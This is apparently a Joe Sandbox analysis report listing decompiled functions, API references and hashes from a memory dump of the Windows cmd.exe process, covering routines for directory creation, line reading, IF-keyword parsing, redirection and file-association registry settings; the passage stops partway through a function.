0x001ca4d1
0x001ca4d4
0x001ca4da
0x001ca4dc
0x001ca4df
0x001ca4e5
0x001ca4ea
0x00000000
0x00000000
0x001ca4ec
0x00000000
0x001ca4ec
0x001ca4f0
0x001ca4f4
0x00000000
0x00000000
0x001ca4fa
0x00000000
0x001ca4fa
0x001ca477
0x001ca479
0x001ca47b
0x001ca47c
0x001ca47c
0x001ca481
0x00000000
0x00000000
0x001ca483
0x001ca486
0x001ca48c
0x001ca48e
0x001ca491
0x001ca493
0x001ca498
0x00000000
0x00000000
0x00000000
0x001ca498
0x001ca49a
0x001ca49f
0x001ca4a0
0x00000000
0x001ca4a0
0x001ca450
0x001bc058
0x001bc058
0x001bc05c
0x001ca420
0x001ca420
0x001bc062
0x001bc07c
0x001bc07c
0x001bc07c
0x001bc082
0x001bc082
0x001bc082
0x001bc088
0x00000000
0x00000000
0x00000000
0x00000000
0x001bc08a
0x001bc08a
0x001bc08c
0x001bc090
0x00000000
0x00000000
0x001bc092
0x001bc095
0x001bc09b
0x001bc09e
0x001bc0a3
0x00000000
0x00000000
0x001bc0a7
0x001bc0ab
0x00000000
0x00000000
0x001bc0b2
0x001bc0b4
0x001bc0b7
0x001bc0bc
0x001bc0f8
0x001bc0f8
0x001bc0c8
0x001bc06d
0x001bc076
0x001bc079
0x00000000
0x00000000
0x00000000
0x00000000
0x001bc0c8
0x001bc0b1
0x00000000
0x001bc0b1
0x001bc0df
0x001bc0e1
0x001bc100
0x001bc100
0x001bc0ed
0x00000000
0x001bc0f3
0x001ca502
0x001ca50d
0x00000000
0x001ca513
0x00000000
0x001ca513
0x001ca50d
0x001bc0ed
0x001bc07c
0x001bc052
0x001bbfeb
0x00000000
0x001bbfeb
0x001bbfce
0x001bbf54
0x001bbf5e
0x001ca3c2
0x001ca3c4
0x001ca3c6
0x001ca3ce
0x00000000
0x001ca3ce
0x00000000

APIs

memset.MSVCRT ref: 001BBF80
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 001BBFC6
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 001BBFE1
??_V@YAXPAX@Z.MSVCRT ref: 001BBFF2

Part of subcall function 001C29BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(001C0B22,001C0B22,00007FE7), ref: 001C29E9

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001BC00E
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 001BC0C0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001BC0CA
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 001BC0E5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001CA502

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
String ID:
API String ID: 402963468-0
Opcode ID: 1edfda457f89a2d51f827c1238781e58edbc33dc9e6995ab589827e620305f9d
Instruction ID: cbcf92df25c055bcb964da79cab0adce249b7e7c7754b470b2a7310c4c9f8147
Opcode Fuzzy Hash: 1edfda457f89a2d51f827c1238781e58edbc33dc9e6995ab589827e620305f9d
Instruction Fuzzy Hash: 5181E535A0021ADADB28EF55DC99BBAB7B4FF68704F548069F505D7190EB70CD80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D396E Relevance: 15.2, APIs: 10, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E001D396E(void* __ecx, short* __edx, long _a4, DWORD* _a8) {
				long _v8;
				char* _v12;
				long _v16;
				void* _v20;
				int _v24;
				short* _v28;
				int _t36;
				signed int _t38;
				int _t41;
				int _t52;
				void* _t54;
				char* _t55;
				int _t57;
				int _t58;
				void _t60;
				int _t62;
				void* _t65;
				DWORD* _t67;

				_t65 = __ecx;
				_v28 = __edx;
				_v20 = __ecx;
				_t54 = 0x1dd620;
				_v16 = SetFilePointer(__ecx, 0, 0, 1);
				if(_a4 >= 0x1fff) {
					_a4 = 0x1fff;
				}
				__imp__AcquireSRWLockShared(0x1f7f20);
				_t36 = ReadFile(_t65, _t54, _a4, _a8, 0);
				__imp__ReleaseSRWLockShared(0x1f7f20);
				if(_t36 != 0) {
					_t67 = _a8;
					_t62 =  *_t67;
					if(_t62 == 0) {
						goto L3;
					}
					_t57 = _t62;
					_v8 = _t62;
					if( *0x1e3854 == 0xfde9 && _v16 == 0 && _a4 > 3) {
						_push(3);
						_push(0x1b3270);
						_push(_t54);
						L001C82C7();
						_t57 = _t62;
						if(_t36 == 0) {
							_t62 = _t62 + 0xfffffffd;
							_v16 = 3;
							_t54 = 0x1dd623;
							 *_t67 = _t62;
							_v8 = _t62;
							_t57 = _t62;
						}
					}
					_v12 = _t54;
					if(_t62 <= 0) {
						L21:
						_t55 = _v12;
						goto L22;
					} else {
						do {
							if(_t57 < 3) {
								L16:
								if( *((char*)(( *_t54 & 0x000000ff) + 0x1f7f30)) == 0) {
									_t57 = _t57 - 1;
									goto L20;
								}
								if(_t57 == 1) {
									__imp__AcquireSRWLockShared(0x1f7f20);
									_t28 = _t54 + 1; // 0x1dd621
									_t52 = ReadFile(_v20, _t28, 1,  &_v8, 0);
									__imp__ReleaseSRWLockShared(0x1f7f20);
									if(_t52 == 0 || _v8 == 0) {
										 *_a8 =  *_a8 & 0x00000000;
										goto L3;
									} else {
										_t67 = _a8;
										_t62 = _t62 + 1;
										goto L21;
									}
								}
								_push(2);
								_t57 = _t57 + 0xfffffffe;
								_pop(1);
								goto L20;
							}
							_t60 =  *_t54;
							if(_t60 != 0xa ||  *(_t54 + 1) != 0xd) {
								_v24 = _t57;
								if(_t60 != 0xd ||  *(_t54 + 1) != 0xa) {
									goto L16;
								} else {
									goto L24;
								}
							} else {
								L24:
								 *((char*)(_t54 + 2)) = 0;
								_t55 = _v12;
								_t62 = _t54 - _t55 + 2;
								SetFilePointer(_v20, _v16 + _t62, 0, 0);
								L22:
								_t58 =  *0x1e3854;
								_t38 = E001C0638(_t58);
								asm("sbb eax, eax");
								_t41 = MultiByteToWideChar(_t58,  ~( ~_t38), _t55, _t62, _v28, _a4);
								 *_t67 = _t41;
								return _t41;
							}
							L20:
							_t54 = _t54 + 1;
							_v8 = _t57;
						} while (_t57 > 0);
						goto L21;
					}
				} else {
					L3:
					return 0;
				}
			}

0x001d397d
0x001d397f
0x001d3985
0x001d3988
0x001d3993
0x001d399e
0x001d39a0
0x001d39a0
0x001d39a9
0x001d39ba
0x001d39c3
0x001d39cb
0x001d39d4
0x001d39d7
0x001d39db
0x00000000
0x00000000
0x001d39e7
0x001d39e9
0x001d39ec
0x001d39fa
0x001d39fc
0x001d3a01
0x001d3a02
0x001d3a0a
0x001d3a0e
0x001d3a10
0x001d3a13
0x001d3a1a
0x001d3a1f
0x001d3a21
0x001d3a24
0x001d3a24
0x001d3a0e
0x001d3a26
0x001d3a2b
0x001d3a75
0x001d3a75
0x00000000
0x001d3a2d
0x001d3a2d
0x001d3a30
0x001d3a4f
0x001d3a59
0x001d3a6a
0x00000000
0x001d3a6b
0x001d3a5e
0x001d3acb
0x001d3ad9
0x001d3ae0
0x001d3aed
0x001d3af5
0x001d3b09
0x00000000
0x001d3afd
0x001d3afd
0x001d3b00
0x00000000
0x001d3b00
0x001d3af5
0x001d3a60
0x001d3a62
0x001d3a65
0x00000000
0x001d3a65
0x001d3a32
0x001d3a37
0x001d3a3f
0x001d3a47
0x00000000
0x00000000
0x00000000
0x00000000
0x001d3aa4
0x001d3aa4
0x001d3aa9
0x001d3aac
0x001d3ab5
0x001d3abe
0x001d3a78
0x001d3a78
0x001d3a7e
0x001d3a8b
0x001d3a93
0x001d3a99
0x00000000
0x001d3a99
0x001d3a6c
0x001d3a6c
0x001d3a6e
0x001d3a71
0x00000000
0x001d3a2d
0x001d39cd
0x001d39cd
0x00000000
0x001d39cd

APIs

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,001D3B43,?,?,?,001D977C), ref: 001D398D
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,001D3B43,?,?,?,001D977C), ref: 001D39A9
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001DD620,?,?,00000000,?,001D3B43,?,?,?,001D977C), ref: 001D39BA
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,001D3B43,?,?,?,001D977C), ref: 001D39C3
memcmp.MSVCRT ref: 001D3A02
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,001F7F20,?,?,?,001D3B43,?,?,?,001D977C), ref: 001D3A93
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,001D3B43,?,?,?,001D977C), ref: 001D3ABE
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,001D3B43,?,?,?,001D977C), ref: 001D3ACB
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001DD621,00000001,001D977C,00000000,?,001D3B43,?,?,?,001D977C), ref: 001D3AE0
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,001D3B43,?,?,?,001D977C), ref: 001D3AED

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
String ID:
API String ID: 2002953238-0
Opcode ID: 0367b21b5ffec8b300a7c39df2d74e2d890b2896666761e04959447bda0050f0
Instruction ID: 2d839d1da313eaf08660c68ac5c1fd6d26084624849540cf34aaccc4c1d4f9bf
Opcode Fuzzy Hash: 0367b21b5ffec8b300a7c39df2d74e2d890b2896666761e04959447bda0050f0
Instruction Fuzzy Hash: 3351A072A04204AFDB259F58CC89BBDBBB9EB94310F14415BF965DB390C7B08E80CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001BCDA2 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E001BCDA2(void* __ecx) {
				void* __ebp;
				void* _t2;
				signed int _t4;
				intOrPtr _t6;
				void* _t18;
				void* _t23;
				void* _t33;
				intOrPtr* _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t2 = E001BF030(0);
				_t40 = _t2 - 0x4000;
				if(_t2 != 0x4000) {
					E001D82EB(0);
				}
				_t4 = E001BE9A0(0, _t40);
				_t36 = _t4;
				__imp___wcsicmp(L"ERRORLEVEL", 0x1efaa0);
				_pop(_t18);
				if(_t4 == 0) {
					 *_t36 = 0x35;
					goto L14;
				} else {
					__imp___wcsicmp(L"EXIST", 0x1efaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x37;
						L14:
						_t6 = E001BEA40(E001BDDCD(_t18, _t18, 0), 0);
						L12:
						 *((intOrPtr*)(_t36 + 0x3c)) = _t6;
						L9:
						return _t36;
					}
					if( *0x1f3cc9 == 0) {
						L7:
						__imp___wcsicmp(L"NOT", 0x1efaa0);
						_pop(_t23);
						if(_t4 == 0) {
							__eflags = _t33;
							if(_t33 != 0) {
								E001D82EB(_t23);
							}
							 *_t36 = 0x38;
							__eflags = 1;
							_t6 = E001BCDA2(1);
							goto L12;
						}
						E001BF300(_t4, 0, 0, 0);
						 *_t36 = 0x39;
						E001B9520(_t36);
						goto L9;
					}
					__imp___wcsicmp(L"CMDEXTVERSION", 0x1efaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x34;
						goto L14;
					}
					if( *0x1f3cc9 == 0) {
						goto L7;
					}
					__imp___wcsicmp(L"DEFINED", 0x1efaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x36;
						goto L14;
					}
					goto L7;
				}
			}

0x001bcdaa
0x001bcdae
0x001bcdb2
0x001bcdb7
0x001bcdbc
0x001cb3f9
0x001cb3f9
0x001bcdc4
0x001bcdce
0x001bcdd6
0x001bcddd
0x001bcde0
0x001cb403
0x00000000
0x001bcde6
0x001bcdec
0x001bcdf3
0x001bcdf6
0x001bce9a
0x001bce86
0x001bce93
0x001bce7b
0x001bce7b
0x001bce60
0x001bce68
0x001bce68
0x001bce03
0x001bce36
0x001bce3c
0x001bce43
0x001bce46
0x001bce69
0x001bce6b
0x001bcea2
0x001bcea2
0x001bce6f
0x001bce75
0x001bce76
0x00000000
0x001bce76
0x001bce4e
0x001bce55
0x001bce5b
0x00000000
0x001bce5b
0x001bce0b
0x001bce12
0x001bce15
0x001cb40e
0x00000000
0x001cb40e
0x001bce22
0x00000000
0x00000000
0x001bce2a
0x001bce31
0x001bce34
0x001bce80
0x00000000
0x001bce80
0x00000000
0x001bce34

APIs

_wcsicmp.MSVCRT ref: 001BCDD6
_wcsicmp.MSVCRT ref: 001BCDEC
_wcsicmp.MSVCRT ref: 001BCE0B
_wcsicmp.MSVCRT ref: 001BCE2A
_wcsicmp.MSVCRT ref: 001BCE3C

Strings

CMDEXTVERSION, xrefs: 001BCE06
NOT, xrefs: 001BCE37
ERRORLEVEL, xrefs: 001BCDD1
DEFINED, xrefs: 001BCE25
EXIST, xrefs: 001BCDE7

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
API String ID: 2081463915-1668778490
Opcode ID: 5541279b4ad0b66398fb3e26bf1cb784d8bab83c2f86bcb4de12782977f9269a
Instruction ID: 6900ca11648fe412d4f8e49d9d83838b4dee5bdc84cb6c5491a16fd88bc32b61
Opcode Fuzzy Hash: 5541279b4ad0b66398fb3e26bf1cb784d8bab83c2f86bcb4de12782977f9269a
Instruction Fuzzy Hash: 6C21A371208601DAEB3D2B79AC46BEB7AD9EB543A0F24442FF483911D1EF75D840C296

Uniqueness

Uniqueness Score: -1.00%

Function 001BD97E Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E001BD97E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				signed int _v552;
				signed int* _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int* _t68;
				signed int _t75;
				signed int _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t89;
				void* _t90;
				signed int _t92;
				void* _t93;
				WCHAR* _t95;
				WCHAR* _t103;
				WCHAR* _t110;
				void* _t116;
				signed int _t120;
				signed int _t123;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t133;
				signed int _t135;
				signed int _t136;
				signed int _t137;

				_t124 = __edx;
				_t56 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t56 ^ _t137;
				_t134 = 0x104;
				_v552 = __edx;
				_t95 = 0;
				_v24 = 1;
				_v28 = 0;
				_t129 = __ecx;
				_v20 = 0x104;
				_v556 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L33:
					_t95 = 1;
					L30:
					__imp__??_V@YAXPAX@Z();
					return E001C6FD0(_t95, _t95, _v8 ^ _t137, _t124, _t129, _t134, _v28);
				}
				_t135 =  *(_t129 + 0x34);
				if(_t135 == 0) {
					L11:
					_t134 = _v552;
					if(_t134 == 3) {
						_t68 =  *0x1f3cd4;
						_v556 = _t68;
						L14:
						_t129 =  *(_t129 + 0x34);
						if(_t129 == 0) {
							goto L30;
						}
						_t134 = _t134 | 0xffffffff;
						do {
							if( *(_t129 + 8) != _t95) {
								goto L29;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == _t134) {
								L39:
								 *(_t129 + 8) = _t134;
								L22:
								_t103 =  *(_t129 + 4);
								if( *_t103 == 0x26) {
									_t103[2] = 0;
									_t124 =  *_t129;
									_t105 = (( *(_t129 + 4))[1] & 0x0000ffff) - 0x30;
									if(E001BDBFC((( *(_t129 + 4))[1] & 0x0000ffff) - 0x30,  *_t129) != _t134) {
										goto L29;
									}
									L52:
									E001BD937();
									_t134 = 0x1f3d00;
									E001C274C(0x1f3d00, 0x104, L"%d",  *_t129);
									E001BC5A2(_t105, 0x2344, 1, 0x1f3d00);
									goto L33;
								}
								_push(_t103);
								if( *((short*)(_t129 + 0x10)) == 0x3c) {
									_t124 = 0x8000;
									_t75 = E001BD120(_t103, 0x8000);
									_v552 = _t75;
									if(_t75 != _t134) {
										L26:
										if(_t75 !=  *_t129) {
											_t124 =  *_t129;
											_t76 = E001BDBFC(_t75,  *_t129);
											_t105 = _v552;
											_t136 = _t76;
											E001BDB92(_v552);
											if(_t136 == 0xffffffff) {
												goto L52;
											}
											_t75 =  *_t129;
											_t134 = _t136 | 0xffffffff;
										}
										if(_t75 == _t134) {
											L53:
											E001BD937();
											E001D985A( *0x1f3cf0);
											goto L33;
										}
										_v556[1] = _t75;
										goto L29;
									}
									_t80 = E001C3320(L"DPATH");
									if(_t80 == 0) {
										goto L53;
									}
									_t110 = _v28;
									if(_t110 == 0) {
										_t110 =  &_v548;
									}
									if(SearchPathW(_t80,  *(_t129 + 4), _t95, _v20, _t110, _t95) == 0) {
										goto L53;
									} else {
										_t103 = _v28;
										if(_t103 == 0) {
											_t103 =  &_v548;
										}
										_push(_t103);
										_t124 = 0x8000;
										L25:
										_t75 = E001BD120(_t103, _t124);
										_v552 = _t75;
										if(_t75 == _t134) {
											goto L53;
										}
										goto L26;
									}
								}
								asm("sbb edx, edx");
								_t124 = ( ~( *(_t129 + 0xc)) & 0xfffffe09) + 0x301;
								goto L25;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == 0xfffffffe) {
								goto L39;
							}
							if(E001C0178(_t68) == 0) {
								_t82 = E001D9953(_t82,  *_t129);
								if(_t82 != 0) {
									goto L20;
								}
								__imp___get_osfhandle( *_t129, _t95, _t95, 1);
								_pop(_t114);
								if(_t82 != _t134) {
									goto L20;
								}
								_t134 = 0x1f3d00;
								E001C274C(0x1f3d00, 0x104, L"%d",  *_t129);
								_push(0x1f3d00);
								_push(1);
								_push(0x40002721);
								L51:
								E001BC5A2(_t114);
								 *(_t129 + 8) = _t95;
								E001BD937();
								goto L33;
							}
							L20:
							_t114 =  *_t129;
							_t83 = E001BDBCE(_t82,  *_t129);
							 *(_t129 + 8) = _t83;
							if(_t83 == _t134) {
								_t134 = 0x1f3d00;
								E001C274C(0x1f3d00, 0x104, L"%d",  *_t129);
								_push(0x1f3d00);
								_push(1);
								_push(0x2344);
								goto L51;
							}
							E001BDB92( *_t129);
							goto L22;
							L29:
							_t68 =  *(_t129 + 0x14);
							_t129 = _t68;
						} while (_t68 != 0);
						goto L30;
					}
					_t116 = 0x10;
					_t68 = E001C00B0(_t116);
					_v556 = _t68;
					if(_t68 == 0) {
						goto L33;
					}
					_t68[3] =  *0x1f3cd4;
					 *0x1f3cd4 = _t68;
					_t68[2] = _t129;
					 *_t68 = _t134;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t118 =  *(_t135 + 4);
					_t130 =  *(_t135 + 4);
					_t128 = _t130 + 2;
					do {
						_t89 =  *_t130;
						_t130 = _t130 + 2;
					} while (_t89 != _t95);
					_t90 = E001C22C0(_t95, _t118);
					_t124 = (_t130 - _t128 >> 1) + 1;
					E001C1040( *(_t135 + 4), (_t130 - _t128 >> 1) + 1, _t90);
					if( *((intOrPtr*)(_t135 + 8)) != _t95) {
						goto L9;
					}
					_t124 =  *(_t135 + 4);
					_t120 = _t124;
					_t133 = _t120 + 2;
					do {
						_t93 =  *_t120;
						_t120 = _t120 + 2;
					} while (_t93 != _t95);
					_t123 = (_t120 - _t133 >> 1) - 1;
					if(_t123 > 1 &&  *((short*)(_t124 + _t123 * 2)) == 0x3a) {
						 *((short*)(_t124 + _t123 * 2)) = 0;
					}
					L9:
					_t92 =  *(_t135 + 0x14);
					_t135 = _t92;
				} while (_t92 != 0);
				_t129 = _v556;
				goto L11;
			}

0x001bd97e
0x001bd989
0x001bd990
0x001bd996
0x001bd99b
0x001bd9a1
0x001bd9a3
0x001bd9ae
0x001bd9b1
0x001bd9b3
0x001bd9b8
0x001bd9be
0x001bd9e4
0x001bdb8d
0x001bdb8f
0x001bdb50
0x001bdb53
0x001bdb6c
0x001bdb6c
0x001bd9ea
0x001bd9ef
0x001bda55
0x001bda55
0x001bda5e
0x001cba31
0x001cba36
0x001bda8d
0x001bda8d
0x001bda92
0x00000000
0x00000000
0x001bda98
0x001bda9b
0x001bda9e
0x00000000
0x00000000
0x001bdaa6
0x001bdaaf
0x001cba90
0x001cba90
0x001bdaef
0x001bdaef
0x001bdaf6
0x001bdb6f
0x001bdb76
0x001bdb7c
0x001bdb86
0x00000000
0x00000000
0x001cbb58
0x001cbb58
0x001cbb5f
0x001cbb6f
0x001cbb7c
0x00000000
0x001cbb81
0x001bdafd
0x001bdafe
0x001cba98
0x001cba9d
0x001cbaa2
0x001cbaaa
0x001bdb2a
0x001bdb2c
0x001cbaff
0x001cbb03
0x001cbb08
0x001cbb0e
0x001cbb10
0x001cbb18
0x00000000
0x00000000
0x001cbb1a
0x001cbb1c
0x001cbb1c
0x001bdb34
0x001cbb89
0x001cbb89
0x001cbb94
0x00000000
0x001cbb94
0x001bdb40
0x00000000
0x001bdb40
0x001cbab5
0x001cbabc
0x00000000
0x00000000
0x001cbac2
0x001cbac7
0x001cbac9
0x001cbac9
0x001cbae1
0x00000000
0x001cbae7
0x001cbae7
0x001cbaec
0x001cbaee
0x001cbaee
0x001cbaf4
0x001cbaf5
0x001bdb17
0x001bdb17
0x001bdb1c
0x001bdb24
0x00000000
0x00000000
0x00000000
0x001bdb24
0x001cbae1
0x001bdb09
0x001bdb11
0x00000000
0x001bdb11
0x001bdab7
0x001bdac1
0x00000000
0x00000000
0x001bdad0
0x001cba43
0x001cba4a
0x00000000
0x00000000
0x001cba56
0x001cba5c
0x001cba66
0x00000000
0x00000000
0x001cba6e
0x001cba7e
0x001cba83
0x001cba84
0x001cba86
0x001cbb43
0x001cbb43
0x001cbb4b
0x001cbb4e
0x00000000
0x001cbb4e
0x001bdad6
0x001bdad6
0x001bdad8
0x001bdadd
0x001bdae2
0x001cbb26
0x001cbb36
0x001cbb3b
0x001cbb3c
0x001cbb3e
0x00000000
0x001cbb3e
0x001bdaea
0x00000000
0x001bdb43
0x001bdb43
0x001bdb46
0x001bdb48
0x00000000
0x001bda9b
0x001bda66
0x001bda67
0x001bda6c
0x001bda74
0x00000000
0x00000000
0x001bda80
0x001bda83
0x001bda88
0x001bda8b
0x00000000
0x00000000
0x00000000
0x00000000
0x001bd9f1
0x001bd9f1
0x001bd9f1
0x001bd9f4
0x001bd9f6
0x001bd9f9
0x001bd9f9
0x001bd9fc
0x001bd9ff
0x001bda08
0x001bda10
0x001bda14
0x001bda1c
0x00000000
0x00000000
0x001bda1e
0x001bda21
0x001bda23
0x001bda26
0x001bda26
0x001bda29
0x001bda2c
0x001bda35
0x001bda39
0x001cba28
0x001cba28
0x001bda46
0x001bda46
0x001bda49
0x001bda4b
0x001bda4f
0x00000000

APIs

memset.MSVCRT ref: 001BD9BE

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

_get_osfhandle.MSVCRT ref: 001BDAA6
_get_osfhandle.MSVCRT ref: 001BDAB7
??_V@YAXPAX@Z.MSVCRT ref: 001BDB53

Strings

DPATH, xrefs: 001CBAB0

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _get_osfhandlememset
String ID: DPATH
API String ID: 3784859044-2010427443
Opcode ID: d552aa5a68ad02d230cc4d321afe080dd519f467b2e1651cbcf08da606071ef8
Instruction ID: d57a1700626bc2f4c8910d38b184a43b8b59f46dc4339c16960e96eba164f043
Opcode Fuzzy Hash: d552aa5a68ad02d230cc4d321afe080dd519f467b2e1651cbcf08da606071ef8
Instruction Fuzzy Hash: C7912670A00216AFCB28AF64EDC6BEAB7A1FF64710F15416DE41997291EB31ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D59E6 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E001D59E6(void* __ecx, signed int __edx, char* _a4) {
				signed int _v8;
				short _v528;
				signed int _v532;
				void* _v536;
				void* _v540;
				long _v544;
				int _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t41;
				short* _t44;
				signed short* _t52;
				char _t55;
				signed short _t62;
				long _t67;
				signed short _t69;
				signed int _t71;
				short* _t73;
				signed int _t75;
				char* _t85;
				void* _t88;
				signed short _t90;
				char* _t93;
				intOrPtr* _t94;
				signed short* _t98;
				void* _t99;
				signed int _t100;

				_t39 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t39 ^ _t100;
				_t75 = __edx;
				_v540 = __ecx;
				_t94 = __edx;
				_v532 = __edx;
				_t93 = _a4;
				_t90 = __edx + 2;
				do {
					_t41 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t41 != 0);
				if((_t94 - _t90 >> 1) + 0x14 <= 0x104) {
					E001C1040( &_v528, 0x104, __edx);
					_t90 = 0x104;
					_t44 =  &_v528;
					while( *_t44 != 0) {
						_t44 = _t44 + 2;
						_t90 = _t90 - 1;
						if(_t90 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t82 =  ~_t90 & 0x00000104 - _t90;
					if(_t90 != 0) {
						_t73 =  &(( &_v528)[_t82]);
						_t99 = 0x104 - _t82;
						if(_t99 == 0) {
							L15:
							_t73 = _t73 - 2;
						} else {
							_t88 = 0x7ffffffe;
							_t90 = L"\\Shell\\Open\\Command" - _t73;
							while(_t88 != 0) {
								_t75 = _v532;
								if(( *(_t73 + _t90) & 0x0000ffff) == 0) {
									break;
								} else {
									_t88 = _t88 - 1;
									 *_t73 =  *(_t73 + _t90) & 0x0000ffff;
									_t73 =  &(_t73[1]);
									_t75 = _v532;
									_t99 = _t99 - 1;
									if(_t99 != 0) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L16;
							}
							if(_t99 == 0) {
								goto L15;
							}
						}
						L16:
						_t82 = 0;
						 *_t73 = 0;
					}
					_t98 = RegOpenKeyExW(_v540,  &_v528, 0, 0x2000000,  &_v536);
					if(_t98 == 0) {
						L30:
						if(_t93 == 0 ||  *_t93 == 0) {
							_t98 = RegDeleteValueW(_v536, 0);
							if(_t98 != 0) {
								E001BC5A2(_t82, 0x400023a5, 1, _t75);
								goto L39;
							}
						} else {
							_t85 = _t93;
							_t90 =  &(_t85[2]);
							do {
								_t55 =  *_t85;
								_t85 =  &(_t85[2]);
							} while (_t55 != 0);
							_t87 = _t85 - _t90 >> 1;
							_t98 = RegSetValueExW(_v536, 0x1b24ac, 0, 2, _t93, 2 + (_t85 - _t90 >> 1) * 2);
							if(_t98 != 0) {
								_push(0);
								_push(_t98);
								E001BC5A2(_t87);
								E001BC5A2(_t87, 0x235d, 1, _t75);
							} else {
								_push(_t93);
								_push(_t75);
								E001C25D9(L"%s=%s\r\n");
								L39:
							}
						}
						RegCloseKey(_v536);
						goto L41;
					} else {
						if(_t93 == 0 ||  *_t93 == 0) {
							E001BC5A2(_t82, 0x400023a5, 1, _t75);
							L41:
							_t52 = _t98;
						} else {
							_t98 =  &_v528;
							while(1) {
								_t62 =  *_t98 & 0x0000ffff;
								_t82 = _t62;
								_v532 = _t62;
								if(_t62 == 0) {
									goto L25;
								}
								_t90 = _t62;
								while(1) {
									_t82 = _t90 & 0x0000ffff;
									_v532 = _t90 & 0x0000ffff;
									if(_t90 == 0x5c) {
										goto L25;
									}
									_t71 = _t98[1] & 0x0000ffff;
									_t98 =  &(_t98[1]);
									_t82 = _t71;
									_t90 = _t71;
									_v532 = _t71;
									if(_t71 != 0) {
										continue;
									}
									goto L25;
								}
								L25:
								 *_t98 = 0;
